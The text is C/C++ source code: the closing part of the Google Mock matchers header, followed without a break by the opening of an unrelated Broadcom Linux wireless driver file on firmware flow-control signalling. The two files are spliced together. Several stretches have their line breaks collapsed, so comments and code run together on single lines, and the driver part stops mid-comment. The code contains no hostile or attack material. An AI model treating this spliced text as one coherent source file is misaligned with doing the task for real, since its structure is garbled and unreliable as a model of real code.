  return internal::FloatingEqMatcher<float>(rhs, true, max_abs_error);
}

// Creates a matcher that matches a pointer (raw or smart) that points
// to a value that matches inner_matcher.
template <typename InnerMatcher>
inline internal::PointeeMatcher<InnerMatcher> Pointee(
    const InnerMatcher& inner_matcher) {
  return internal::PointeeMatcher<InnerMatcher>(inner_matcher);
}

// Creates a matcher that matches an object whose given field matches
// 'matcher'.  For example,
//   Field(&Foo::number, Ge(5))
// matches a Foo object x iff x.number >= 5.
template <typename Class, typename FieldType, typename FieldMatcher>
inline PolymorphicMatcher<
  internal::FieldMatcher<Class, FieldType> > Field(
    FieldType Class::*field, const FieldMatcher& matcher) {
  return MakePolymorphicMatcher(
      internal::FieldMatcher<Class, FieldType>(
          field, MatcherCast<const FieldType&>(matcher)));
  // The call to MatcherCast() is required for supporting inner
  // matchers of compatible types.  For example, it allows
  //   Field(&Foo::bar, m)
  // to compile where bar is an int32 and m is a matcher for int64.
}

// Creates a matcher that matches an object whose given property
// matches 'matcher'.  For example,
//   Property(&Foo::str, StartsWith("hi"))
// matches a Foo object x iff x.str() starts with "hi".
// The property accessor must be a const member function taking no arguments.
template <typename Class, typename PropertyType, typename PropertyMatcher>
inline PolymorphicMatcher<
  internal::PropertyMatcher<Class, PropertyType> > Property(
    PropertyType (Class::*property)() const, const PropertyMatcher& matcher) {
  return MakePolymorphicMatcher(
      internal::PropertyMatcher<Class, PropertyType>(
          property,
          MatcherCast<GTEST_REFERENCE_TO_CONST_(PropertyType)>(matcher)));
  // The call to MatcherCast() is required for supporting inner
  // matchers of compatible types.  For example, it allows
  //   Property(&Foo::bar, m)
  // to compile where bar() returns an int32 and m is a matcher for int64.
}

// Creates a matcher that matches an object iff the result of applying
// a callable to x matches 'matcher'.
// For example,
//   ResultOf(f, StartsWith("hi"))
// matches a Foo object x iff f(x) starts with "hi".
// callable parameter can be a function, function pointer, or a functor.
// Callable has to satisfy the following conditions:
//   * It is required to keep no state affecting the results of
//     the calls on it and make no assumptions about how many calls
//     will be made. Any state it keeps must be protected from the
//     concurrent access.
//   * If it is a function object, it has to define type result_type.
// We recommend deriving your functor classes from std::unary_function. template <typename Callable, typename ResultOfMatcher> internal::ResultOfMatcher<Callable> ResultOf( Callable callable, const ResultOfMatcher& matcher) { return internal::ResultOfMatcher<Callable>( callable, MatcherCast<typename internal::CallableTraits<Callable>::ResultType>( matcher)); // The call to MatcherCast() is required for supporting inner // matchers of compatible types. For example, it allows // ResultOf(Function, m) // to compile where Function() returns an int32 and m is a matcher for int64. } // String matchers. // Matches a string equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrEq(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, true, true)); } // Matches a string not equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrNe(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, false, true)); } // Matches a string equal to str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrCaseEq(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, true, false)); } // Matches a string not equal to str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrCaseNe(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, false, false)); } // Creates a matcher that matches any string, std::string, or C string // that contains the given substring. 
inline PolymorphicMatcher<internal::HasSubstrMatcher<internal::string> >
    HasSubstr(const internal::string& substring) {
  return MakePolymorphicMatcher(internal::HasSubstrMatcher<internal::string>(
      substring));
}

// Matches a string that starts with 'prefix' (case-sensitive).
inline PolymorphicMatcher<internal::StartsWithMatcher<internal::string> >
    StartsWith(const internal::string& prefix) {
  return MakePolymorphicMatcher(internal::StartsWithMatcher<internal::string>(
      prefix));
}

// Matches a string that ends with 'suffix' (case-sensitive).
inline PolymorphicMatcher<internal::EndsWithMatcher<internal::string> >
    EndsWith(const internal::string& suffix) {
  return MakePolymorphicMatcher(internal::EndsWithMatcher<internal::string>(
      suffix));
}

// Matches a string that fully matches regular expression 'regex'.
// The matcher takes ownership of 'regex'.
inline PolymorphicMatcher<internal::MatchesRegexMatcher> MatchesRegex(
    const internal::RE* regex) {
  return MakePolymorphicMatcher(internal::MatchesRegexMatcher(regex, true));
}
// Convenience overload: compiles the pattern string into an RE object.
inline PolymorphicMatcher<internal::MatchesRegexMatcher> MatchesRegex(
    const internal::string& regex) {
  return MatchesRegex(new internal::RE(regex));
}

// Matches a string that contains regular expression 'regex'.
// The matcher takes ownership of 'regex'.
inline PolymorphicMatcher<internal::MatchesRegexMatcher> ContainsRegex(
    const internal::RE* regex) {
  return MakePolymorphicMatcher(internal::MatchesRegexMatcher(regex, false));
}
// Convenience overload: compiles the pattern string into an RE object.
inline PolymorphicMatcher<internal::MatchesRegexMatcher> ContainsRegex(
    const internal::string& regex) {
  return ContainsRegex(new internal::RE(regex));
}

#if GTEST_HAS_GLOBAL_WSTRING || GTEST_HAS_STD_WSTRING
// Wide string matchers.

// Matches a string equal to str.
inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> >
    StrEq(const internal::wstring& str) {
  return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>(
      str, true, true));
}

// Matches a string not equal to str.
inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> >
    StrNe(const internal::wstring& str) {
  return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>(
      str, false, true));
}

// Matches a string equal to str, ignoring case.
inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> >
    StrCaseEq(const internal::wstring& str) {
  return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>(
      str, true, false));
}

// Matches a string not equal to str, ignoring case.
inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> >
    StrCaseNe(const internal::wstring& str) {
  return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>(
      str, false, false));
}

// Creates a matcher that matches any wstring, std::wstring, or C wide string
// that contains the given substring.
inline PolymorphicMatcher<internal::HasSubstrMatcher<internal::wstring> >
    HasSubstr(const internal::wstring& substring) {
  return MakePolymorphicMatcher(internal::HasSubstrMatcher<internal::wstring>(
      substring));
}

// Matches a string that starts with 'prefix' (case-sensitive).
inline PolymorphicMatcher<internal::StartsWithMatcher<internal::wstring> >
    StartsWith(const internal::wstring& prefix) {
  return MakePolymorphicMatcher(internal::StartsWithMatcher<internal::wstring>(
      prefix));
}

// Matches a string that ends with 'suffix' (case-sensitive).
inline PolymorphicMatcher<internal::EndsWithMatcher<internal::wstring> >
    EndsWith(const internal::wstring& suffix) {
  return MakePolymorphicMatcher(internal::EndsWithMatcher<internal::wstring>(
      suffix));
}

#endif  // GTEST_HAS_GLOBAL_WSTRING || GTEST_HAS_STD_WSTRING

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field == the second field.
inline internal::Eq2Matcher Eq() { return internal::Eq2Matcher(); }

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field >= the second field.
inline internal::Ge2Matcher Ge() { return internal::Ge2Matcher(); }

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field > the second field.
inline internal::Gt2Matcher Gt() { return internal::Gt2Matcher(); }

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field <= the second field.
inline internal::Le2Matcher Le() { return internal::Le2Matcher(); }

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field < the second field.
inline internal::Lt2Matcher Lt() { return internal::Lt2Matcher(); }

// Creates a polymorphic matcher that matches a 2-tuple where the
// first field != the second field.
inline internal::Ne2Matcher Ne() { return internal::Ne2Matcher(); }

// Creates a matcher that matches any value of type T that m doesn't
// match.
template <typename InnerMatcher>
inline internal::NotMatcher<InnerMatcher> Not(InnerMatcher m) {
  return internal::NotMatcher<InnerMatcher>(m);
}

// Returns a matcher that matches anything that satisfies the given
// predicate.  The predicate can be any unary function or functor
// whose return type can be implicitly converted to bool.
template <typename Predicate>
inline PolymorphicMatcher<internal::TrulyMatcher<Predicate> >
Truly(Predicate pred) {
  return MakePolymorphicMatcher(internal::TrulyMatcher<Predicate>(pred));
}

// Returns a matcher that matches the container size. The container must
// support both size() and size_type which all STL-like containers provide.
// Note that the parameter 'size' can be a value of type size_type as well as
// matcher. For instance:
//   EXPECT_THAT(container, SizeIs(2));     // Checks container has 2 elements.
//   EXPECT_THAT(container, SizeIs(Le(2));  // Checks container has at most 2.
template <typename SizeMatcher>
inline internal::SizeIsMatcher<SizeMatcher>
SizeIs(const SizeMatcher& size_matcher) {
  return internal::SizeIsMatcher<SizeMatcher>(size_matcher);
}

// Returns a matcher that matches the distance between the container's begin()
// iterator and its end() iterator, i.e. the size of the container. This
// matcher can be used instead of SizeIs with containers such as
// std::forward_list which do not implement size(). The container must
// provide const_iterator (with valid iterator_traits), begin() and end().
template <typename DistanceMatcher>
inline internal::BeginEndDistanceIsMatcher<DistanceMatcher>
BeginEndDistanceIs(const DistanceMatcher& distance_matcher) {
  return internal::BeginEndDistanceIsMatcher<DistanceMatcher>(
      distance_matcher);
}

// Returns a matcher that matches an equal container.
// This matcher behaves like Eq(), but in the event of mismatch lists the
// values that are included in one container but not the other. (Duplicate
// values and order differences are not explained.)
template <typename Container>
inline PolymorphicMatcher<internal::ContainerEqMatcher<  // NOLINT
                            GTEST_REMOVE_CONST_(Container)> >
    ContainerEq(const Container& rhs) {
  // This following line is for working around a bug in MSVC 8.0,
  // which causes Container to be a const type sometimes.
  typedef GTEST_REMOVE_CONST_(Container) RawContainer;
  return MakePolymorphicMatcher(
      internal::ContainerEqMatcher<RawContainer>(rhs));
}

// Returns a matcher that matches a container that, when sorted using
// the given comparator, matches container_matcher.
template <typename Comparator, typename ContainerMatcher>
inline internal::WhenSortedByMatcher<Comparator, ContainerMatcher>
WhenSortedBy(const Comparator& comparator,
             const ContainerMatcher& container_matcher) {
  return internal::WhenSortedByMatcher<Comparator, ContainerMatcher>(
      comparator, container_matcher);
}

// Returns a matcher that matches a container that, when sorted using
// the < operator, matches container_matcher.
template <typename ContainerMatcher>
inline internal::WhenSortedByMatcher<internal::LessComparator, ContainerMatcher>
WhenSorted(const ContainerMatcher& container_matcher) {
  return
      internal::WhenSortedByMatcher<internal::LessComparator, ContainerMatcher>(
          internal::LessComparator(), container_matcher);
}

// Matches an STL-style container or a native array that contains the
// same number of elements as in rhs, where its i-th element and rhs's
// i-th element (as a pair) satisfy the given pair matcher, for all i.
// TupleMatcher must be able to be safely cast to Matcher<tuple<const
// T1&, const T2&> >, where T1 and T2 are the types of elements in the
// LHS container and the RHS container respectively.
template <typename TupleMatcher, typename Container>
inline internal::PointwiseMatcher<TupleMatcher,
                                  GTEST_REMOVE_CONST_(Container)>
Pointwise(const TupleMatcher& tuple_matcher, const Container& rhs) {
  // This following line is for working around a bug in MSVC 8.0,
  // which causes Container to be a const type sometimes.
  typedef GTEST_REMOVE_CONST_(Container) RawContainer;
  return internal::PointwiseMatcher<TupleMatcher, RawContainer>(
      tuple_matcher, rhs);
}

// Matches an STL-style container or a native array that contains at
// least one element matching the given value or matcher.
// // Examples: // ::std::set<int> page_ids; // page_ids.insert(3); // page_ids.insert(1); // EXPECT_THAT(page_ids, Contains(1)); // EXPECT_THAT(page_ids, Contains(Gt(2))); // EXPECT_THAT(page_ids, Not(Contains(4))); // // ::std::map<int, size_t> page_lengths; // page_lengths[1] = 100; // EXPECT_THAT(page_lengths, // Contains(::std::pair<const int, size_t>(1, 100))); // // const char* user_ids[] = { "joe", "mike", "tom" }; // EXPECT_THAT(user_ids, Contains(Eq(::std::string("tom")))); template <typename M> inline internal::ContainsMatcher<M> Contains(M matcher) { return internal::ContainsMatcher<M>(matcher); } // Matches an STL-style container or a native array that contains only // elements matching the given value or matcher. // // Each(m) is semantically equivalent to Not(Contains(Not(m))). Only // the messages are different. // // Examples: // ::std::set<int> page_ids; // // Each(m) matches an empty container, regardless of what m is. // EXPECT_THAT(page_ids, Each(Eq(1))); // EXPECT_THAT(page_ids, Each(Eq(77))); // // page_ids.insert(3); // EXPECT_THAT(page_ids, Each(Gt(0))); // EXPECT_THAT(page_ids, Not(Each(Gt(4)))); // page_ids.insert(1); // EXPECT_THAT(page_ids, Not(Each(Lt(2)))); // // ::std::map<int, size_t> page_lengths; // page_lengths[1] = 100; // page_lengths[2] = 200; // page_lengths[3] = 300; // EXPECT_THAT(page_lengths, Not(Each(Pair(1, 100)))); // EXPECT_THAT(page_lengths, Each(Key(Le(3)))); // // const char* user_ids[] = { "joe", "mike", "tom" }; // EXPECT_THAT(user_ids, Not(Each(Eq(::std::string("tom"))))); template <typename M> inline internal::EachMatcher<M> Each(M matcher) { return internal::EachMatcher<M>(matcher); } // Key(inner_matcher) matches an std::pair whose 'first' field matches // inner_matcher. For example, Contains(Key(Ge(5))) can be used to match an // std::map that contains at least one element whose key is >= 5. 
template <typename M>
inline internal::KeyMatcher<M> Key(M inner_matcher) {
  return internal::KeyMatcher<M>(inner_matcher);
}

// Pair(first_matcher, second_matcher) matches a std::pair whose 'first' field
// matches first_matcher and whose 'second' field matches second_matcher.  For
// example, EXPECT_THAT(map_type, ElementsAre(Pair(Ge(5), "foo"))) can be used
// to match a std::map<int, string> that contains exactly one element whose key
// is >= 5 and whose value equals "foo".
template <typename FirstMatcher, typename SecondMatcher>
inline internal::PairMatcher<FirstMatcher, SecondMatcher>
Pair(FirstMatcher first_matcher, SecondMatcher second_matcher) {
  return internal::PairMatcher<FirstMatcher, SecondMatcher>(
      first_matcher, second_matcher);
}

// Returns a predicate that is satisfied by anything that matches the
// given matcher.
template <typename M>
inline internal::MatcherAsPredicate<M> Matches(M matcher) {
  return internal::MatcherAsPredicate<M>(matcher);
}

// Returns true iff the value matches the matcher.
template <typename T, typename M>
inline bool Value(const T& value, M matcher) {
  return testing::Matches(matcher)(value);
}

// Matches the value against the given matcher and explains the match
// result to listener.
template <typename T, typename M>
inline bool ExplainMatchResult(
    M matcher, const T& value, MatchResultListener* listener) {
  return SafeMatcherCast<const T&>(matcher).MatchAndExplain(value, listener);
}

#if GTEST_LANG_CXX11
// Define variadic matcher versions. They are overloaded in
// gmock-generated-matchers.h for the cases supported by pre C++11 compilers.

// AllOf(m1, ..., mn) matches iff every mi matches.
template <typename... Args>
inline internal::AllOfMatcher<Args...> AllOf(const Args&... matchers) {
  return internal::AllOfMatcher<Args...>(matchers...);
}

// AnyOf(m1, ..., mn) matches iff at least one mi matches.
template <typename... Args>
inline internal::AnyOfMatcher<Args...> AnyOf(const Args&... matchers) {
  return internal::AnyOfMatcher<Args...>(matchers...);
}

#endif  // GTEST_LANG_CXX11

// AllArgs(m) is a synonym of m.  This is useful in
//
//   EXPECT_CALL(foo, Bar(_, _)).With(AllArgs(Eq()));
//
// which is easier to read than
//
//   EXPECT_CALL(foo, Bar(_, _)).With(Eq());
template <typename InnerMatcher>
inline InnerMatcher AllArgs(const InnerMatcher& matcher) { return matcher; }

// These macros allow using matchers to check values in Google Test
// tests.  ASSERT_THAT(value, matcher) and EXPECT_THAT(value, matcher)
// succeed iff the value matches the matcher.  If the assertion fails,
// the value and the description of the matcher will be printed.
#define ASSERT_THAT(value, matcher) ASSERT_PRED_FORMAT1(\
    ::testing::internal::MakePredicateFormatterFromMatcher(matcher), value)
#define EXPECT_THAT(value, matcher) EXPECT_PRED_FORMAT1(\
    ::testing::internal::MakePredicateFormatterFromMatcher(matcher), value)

}  // namespace testing

#endif  // GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_
/* * Copyright (c) 2010 Broadcom Corporation * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include <linux/types.h> #include <linux/module.h> #include <linux/if_ether.h> #include <linux/spinlock.h> #include <linux/skbuff.h> #include <linux/netdevice.h> #include <linux/etherdevice.h> #include <linux/err.h> #include <linux/jiffies.h> #include <net/cfg80211.h> #include <brcmu_utils.h> #include <brcmu_wifi.h> #include "core.h" #include "debug.h" #include "bus.h" #include "fwil.h" #include "fwil_types.h" #include "fweh.h" #include "fwsignal.h" #include "p2p.h" #include "cfg80211.h" #include "proto.h" /** * DOC: Firmware Signalling * * Firmware can send signals to host and vice versa, which are passed in the * data packets using TLV based header. This signalling layer is on top of the * BDC bus protocol layer. */ /* * single definition for firmware-driver flow control tlv's. * * each tlv is specified by BRCMF_FWS_TLV_DEF(name, ID, length). * A length value 0 indicates variable length tlv. 
 */
/* X-macro list of all TLVs: BRCMF_FWS_TLV_DEF(name, ID, length).
 * Expanded below (with different definitions of BRCMF_FWS_TLV_DEF) to
 * generate the id enum, the length enum, and the debug name table, so
 * the three stay in sync by construction.
 */
#define BRCMF_FWS_TLV_DEFLIST \
	BRCMF_FWS_TLV_DEF(MAC_OPEN, 1, 1) \
	BRCMF_FWS_TLV_DEF(MAC_CLOSE, 2, 1) \
	BRCMF_FWS_TLV_DEF(MAC_REQUEST_CREDIT, 3, 2) \
	BRCMF_FWS_TLV_DEF(TXSTATUS, 4, 4) \
	BRCMF_FWS_TLV_DEF(PKTTAG, 5, 4) \
	BRCMF_FWS_TLV_DEF(MACDESC_ADD, 6, 8) \
	BRCMF_FWS_TLV_DEF(MACDESC_DEL, 7, 8) \
	BRCMF_FWS_TLV_DEF(RSSI, 8, 1) \
	BRCMF_FWS_TLV_DEF(INTERFACE_OPEN, 9, 1) \
	BRCMF_FWS_TLV_DEF(INTERFACE_CLOSE, 10, 1) \
	BRCMF_FWS_TLV_DEF(FIFO_CREDITBACK, 11, 6) \
	BRCMF_FWS_TLV_DEF(PENDING_TRAFFIC_BMP, 12, 2) \
	BRCMF_FWS_TLV_DEF(MAC_REQUEST_PACKET, 13, 3) \
	BRCMF_FWS_TLV_DEF(HOST_REORDER_RXPKTS, 14, 10) \
	BRCMF_FWS_TLV_DEF(TRANS_ID, 18, 6) \
	BRCMF_FWS_TLV_DEF(COMP_TXSTATUS, 19, 1) \
	BRCMF_FWS_TLV_DEF(FILLER, 255, 0)

/*
 * enum brcmf_fws_tlv_type - definition of tlv identifiers.
 */
#define BRCMF_FWS_TLV_DEF(name, id, len) \
	BRCMF_FWS_TYPE_ ## name = id,
enum brcmf_fws_tlv_type {
	BRCMF_FWS_TLV_DEFLIST
	BRCMF_FWS_TYPE_INVALID
};
#undef BRCMF_FWS_TLV_DEF

/*
 * enum brcmf_fws_tlv_len - definition of tlv lengths.
 */
#define BRCMF_FWS_TLV_DEF(name, id, len) \
	BRCMF_FWS_TYPE_ ## name ## _LEN = (len),
enum brcmf_fws_tlv_len {
	BRCMF_FWS_TLV_DEFLIST
};
#undef BRCMF_FWS_TLV_DEF

#ifdef DEBUG
/*
 * brcmf_fws_tlv_names - array of tlv names.
 */
#define BRCMF_FWS_TLV_DEF(name, id, len) \
	{ id, #name },
static struct {
	enum brcmf_fws_tlv_type id;
	const char *name;
} brcmf_fws_tlv_names[] = {
	BRCMF_FWS_TLV_DEFLIST
};
#undef BRCMF_FWS_TLV_DEF

/* Linear lookup of the debug name for a TLV id; returns "INVALID" for
 * ids not present in the table.
 */
static const char *brcmf_fws_get_tlv_name(enum brcmf_fws_tlv_type id)
{
	int i;

	for (i = 0; i < ARRAY_SIZE(brcmf_fws_tlv_names); i++)
		if (brcmf_fws_tlv_names[i].id == id)
			return brcmf_fws_tlv_names[i].name;

	return "INVALID";
}
#else
/* Non-DEBUG builds carry no name table; always returns a placeholder. */
static const char *brcmf_fws_get_tlv_name(enum brcmf_fws_tlv_type id)
{
	return "NODEBUG";
}
#endif /* DEBUG */

/*
 * The PKTTAG tlv has additional bytes when firmware-signalling
 * mode has REUSESEQ flag set.
 */
#define BRCMF_FWS_TYPE_SEQ_LEN				2

/*
 * flags used to enable tlv signalling from firmware.
*/ #define BRCMF_FWS_FLAGS_RSSI_SIGNALS 0x0001 #define BRCMF_FWS_FLAGS_XONXOFF_SIGNALS 0x0002 #define BRCMF_FWS_FLAGS_CREDIT_STATUS_SIGNALS 0x0004 #define BRCMF_FWS_FLAGS_HOST_PROPTXSTATUS_ACTIVE 0x0008 #define BRCMF_FWS_FLAGS_PSQ_GENERATIONFSM_ENABLE 0x0010 #define BRCMF_FWS_FLAGS_PSQ_ZERO_BUFFER_ENABLE 0x0020 #define BRCMF_FWS_FLAGS_HOST_RXREORDER_ACTIVE 0x0040 #define BRCMF_FWS_MAC_DESC_TABLE_SIZE 32 #define BRCMF_FWS_MAC_DESC_ID_INVALID 0xff #define BRCMF_FWS_HOSTIF_FLOWSTATE_OFF 0 #define BRCMF_FWS_HOSTIF_FLOWSTATE_ON 1 #define BRCMF_FWS_FLOWCONTROL_HIWATER 128 #define BRCMF_FWS_FLOWCONTROL_LOWATER 64 #define BRCMF_FWS_PSQ_PREC_COUNT ((BRCMF_FWS_FIFO_COUNT + 1) * 2) #define BRCMF_FWS_PSQ_LEN 256 #define BRCMF_FWS_HTOD_FLAG_PKTFROMHOST 0x01 #define BRCMF_FWS_HTOD_FLAG_PKT_REQUESTED 0x02 #define BRCMF_FWS_RET_OK_NOSCHEDULE 0 #define BRCMF_FWS_RET_OK_SCHEDULE 1 #define BRCMF_FWS_MODE_REUSESEQ_SHIFT 3 /* seq reuse */ #define BRCMF_FWS_MODE_SET_REUSESEQ(x, val) ((x) = \ ((x) & ~(1 << BRCMF_FWS_MODE_REUSESEQ_SHIFT)) | \ (((val) & 1) << BRCMF_FWS_MODE_REUSESEQ_SHIFT)) #define BRCMF_FWS_MODE_GET_REUSESEQ(x) \ (((x) >> BRCMF_FWS_MODE_REUSESEQ_SHIFT) & 1) /** * enum brcmf_fws_skb_state - indicates processing state of skb. * * @BRCMF_FWS_SKBSTATE_NEW: sk_buff is newly arrived in the driver. * @BRCMF_FWS_SKBSTATE_DELAYED: sk_buff had to wait on queue. * @BRCMF_FWS_SKBSTATE_SUPPRESSED: sk_buff has been suppressed by firmware. * @BRCMF_FWS_SKBSTATE_TIM: allocated for TIM update info. */ enum brcmf_fws_skb_state { BRCMF_FWS_SKBSTATE_NEW, BRCMF_FWS_SKBSTATE_DELAYED, BRCMF_FWS_SKBSTATE_SUPPRESSED, BRCMF_FWS_SKBSTATE_TIM }; /** * struct brcmf_skbuff_cb - control buffer associated with skbuff. * * @bus_flags: 2 bytes reserved for bus specific parameters * @if_flags: holds interface index and packet related flags. * @htod: host to device packet identifier (used in PKTTAG tlv). * @htod_seq: this 16-bit is original seq number for every suppress packet. 
 * @state: transmit state of the packet.
 * @mac: descriptor related to destination for this packet.
 *
 * This information is stored in control buffer struct sk_buff::cb, which
 * provides 48 bytes of storage so this structure should not exceed that.
 */
struct brcmf_skbuff_cb {
	u16 bus_flags;
	u16 if_flags;
	u32 htod;
	u16 htod_seq;
	enum brcmf_fws_skb_state state;
	struct brcmf_fws_mac_descriptor *mac;
};

/*
 * macro casting skbuff control buffer to struct brcmf_skbuff_cb.
 */
#define brcmf_skbcb(skb)	((struct brcmf_skbuff_cb *)((skb)->cb))

/*
 * sk_buff control if flags
 *
 *	b[11]  - packet sent upon firmware request.
 *	b[10]  - packet only contains signalling data.
 *	b[9]   - packet is a tx packet.
 *	b[8]   - packet used requested credit
 *	b[7]   - interface in AP mode.
 *	b[3:0] - interface index.
 */
#define BRCMF_SKB_IF_FLAGS_REQUESTED_MASK	0x0800
#define BRCMF_SKB_IF_FLAGS_REQUESTED_SHIFT	11
#define BRCMF_SKB_IF_FLAGS_SIGNAL_ONLY_MASK	0x0400
#define BRCMF_SKB_IF_FLAGS_SIGNAL_ONLY_SHIFT	10
#define BRCMF_SKB_IF_FLAGS_TRANSMIT_MASK	0x0200
#define BRCMF_SKB_IF_FLAGS_TRANSMIT_SHIFT	9
#define BRCMF_SKB_IF_FLAGS_REQ_CREDIT_MASK	0x0100
#define BRCMF_SKB_IF_FLAGS_REQ_CREDIT_SHIFT	8
#define BRCMF_SKB_IF_FLAGS_IF_AP_MASK		0x0080
#define BRCMF_SKB_IF_FLAGS_IF_AP_SHIFT		7
#define BRCMF_SKB_IF_FLAGS_INDEX_MASK		0x000f
#define BRCMF_SKB_IF_FLAGS_INDEX_SHIFT		0

/* field accessors built on the brcmu 16-bit mask/shift helpers */
#define brcmf_skb_if_flags_set_field(skb, field, value) \
	brcmu_maskset16(&(brcmf_skbcb(skb)->if_flags), \
			BRCMF_SKB_IF_FLAGS_ ## field ## _MASK, \
			BRCMF_SKB_IF_FLAGS_ ## field ## _SHIFT, (value))
#define brcmf_skb_if_flags_get_field(skb, field) \
	brcmu_maskget16(brcmf_skbcb(skb)->if_flags, \
			BRCMF_SKB_IF_FLAGS_ ## field ## _MASK, \
			BRCMF_SKB_IF_FLAGS_ ## field ## _SHIFT)

/*
 * sk_buff control packet identifier
 *
 * 32-bit packet identifier used in PKTTAG tlv from host to dongle.
 *
 * - Generated at the host (e.g. dhd)
 * - Seen as a generic sequence number by firmware except for the flags field.
 *
 * Generation	: b[31]		=> generation number for this packet [host->fw]
 *				   OR, current generation number [fw->host]
 * Flags	: b[30:27]	=> command, status flags
 * FIFO-AC	: b[26:24]	=> AC-FIFO id
 * h-slot	: b[23:8]	=> hanger-slot
 * freerun	: b[7:0]	=> A free running counter
 */
#define BRCMF_SKB_HTOD_TAG_GENERATION_MASK	0x80000000
#define BRCMF_SKB_HTOD_TAG_GENERATION_SHIFT	31
#define BRCMF_SKB_HTOD_TAG_FLAGS_MASK		0x78000000
#define BRCMF_SKB_HTOD_TAG_FLAGS_SHIFT		27
#define BRCMF_SKB_HTOD_TAG_FIFO_MASK		0x07000000
#define BRCMF_SKB_HTOD_TAG_FIFO_SHIFT		24
#define BRCMF_SKB_HTOD_TAG_HSLOT_MASK		0x00ffff00
#define BRCMF_SKB_HTOD_TAG_HSLOT_SHIFT		8
#define BRCMF_SKB_HTOD_TAG_FREERUN_MASK		0x000000ff
#define BRCMF_SKB_HTOD_TAG_FREERUN_SHIFT	0

#define brcmf_skb_htod_tag_set_field(skb, field, value) \
	brcmu_maskset32(&(brcmf_skbcb(skb)->htod), \
			BRCMF_SKB_HTOD_TAG_ ## field ## _MASK, \
			BRCMF_SKB_HTOD_TAG_ ## field ## _SHIFT, (value))
#define brcmf_skb_htod_tag_get_field(skb, field) \
	brcmu_maskget32(brcmf_skbcb(skb)->htod, \
			BRCMF_SKB_HTOD_TAG_ ## field ## _MASK, \
			BRCMF_SKB_HTOD_TAG_ ## field ## _SHIFT)

#define BRCMF_SKB_HTOD_SEQ_FROMFW_MASK		0x2000
#define BRCMF_SKB_HTOD_SEQ_FROMFW_SHIFT		13
#define BRCMF_SKB_HTOD_SEQ_FROMDRV_MASK		0x1000
#define BRCMF_SKB_HTOD_SEQ_FROMDRV_SHIFT	12
#define BRCMF_SKB_HTOD_SEQ_NR_MASK		0x0fff
#define BRCMF_SKB_HTOD_SEQ_NR_SHIFT		0

#define brcmf_skb_htod_seq_set_field(skb, field, value) \
	brcmu_maskset16(&(brcmf_skbcb(skb)->htod_seq), \
			BRCMF_SKB_HTOD_SEQ_ ## field ## _MASK, \
			BRCMF_SKB_HTOD_SEQ_ ## field ## _SHIFT, (value))
#define brcmf_skb_htod_seq_get_field(skb, field) \
	brcmu_maskget16(brcmf_skbcb(skb)->htod_seq, \
			BRCMF_SKB_HTOD_SEQ_ ## field ## _MASK, \
			BRCMF_SKB_HTOD_SEQ_ ## field ## _SHIFT)

/* txstatus words from firmware use the same layout as the htod tag */
#define BRCMF_FWS_TXSTAT_GENERATION_MASK	0x80000000
#define BRCMF_FWS_TXSTAT_GENERATION_SHIFT	31
#define BRCMF_FWS_TXSTAT_FLAGS_MASK		0x78000000
#define BRCMF_FWS_TXSTAT_FLAGS_SHIFT		27
#define BRCMF_FWS_TXSTAT_FIFO_MASK		0x07000000
#define BRCMF_FWS_TXSTAT_FIFO_SHIFT		24
#define BRCMF_FWS_TXSTAT_HSLOT_MASK		0x00FFFF00
#define BRCMF_FWS_TXSTAT_HSLOT_SHIFT		8
#define BRCMF_FWS_TXSTAT_FREERUN_MASK		0x000000FF
#define BRCMF_FWS_TXSTAT_FREERUN_SHIFT		0

#define brcmf_txstatus_get_field(txs, field) \
	brcmu_maskget32(txs, BRCMF_FWS_TXSTAT_ ## field ## _MASK, \
			BRCMF_FWS_TXSTAT_ ## field ## _SHIFT)

/* How long to defer borrowing in jiffies */
#define BRCMF_FWS_BORROW_DEFER_PERIOD		(HZ / 10)

/**
 * enum brcmf_fws_fifo - fifo indices used by dongle firmware.
 *
 * @BRCMF_FWS_FIFO_FIRST: first fifo, ie. background.
 * @BRCMF_FWS_FIFO_AC_BK: fifo for background traffic.
 * @BRCMF_FWS_FIFO_AC_BE: fifo for best-effort traffic.
 * @BRCMF_FWS_FIFO_AC_VI: fifo for video traffic.
 * @BRCMF_FWS_FIFO_AC_VO: fifo for voice traffic.
 * @BRCMF_FWS_FIFO_BCMC: fifo for broadcast/multicast (AP only).
 * @BRCMF_FWS_FIFO_ATIM: fifo for ATIM (AP only).
